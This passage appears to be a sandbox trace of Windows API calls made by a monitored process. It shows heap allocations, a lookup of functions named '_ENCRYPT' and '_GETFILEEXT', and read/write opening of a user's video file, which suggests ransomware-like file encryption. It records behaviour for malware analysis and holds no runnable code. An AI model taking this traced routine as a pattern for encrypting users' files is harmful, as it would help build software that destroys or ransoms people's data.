[0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.714] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.714] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0194.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd510 [0194.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd510, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0194.715] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\6rbgdlsa.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0194.715] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.715] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0194.715] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0194.715] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0194.716] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0194.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0194.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0194.716] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.716] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0194.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0194.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0194.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0194.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0194.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0194.716] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0194.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0194.716] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0194.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0194.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1930 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0194.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0194.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0194.717] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0194.717] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0194.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0194.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0194.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0194.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0194.718] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0194.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0194.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0194.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0194.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0194.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.720] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.721] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0194.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.721] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0194.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.722] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb86e90, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x9c8857a0, ftLastAccessTime.dwHighDateTime=0x1d5dfea, ftLastWriteTime.dwLowDateTime=0x9c8857a0, ftLastWriteTime.dwHighDateTime=0x1d5dfea, nFileSizeHigh=0x0, nFileSizeLow=0x22da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="6rBGDlSa.avi", cAlternateFileName="")) returned 0x90add8 [0194.722] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0194.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 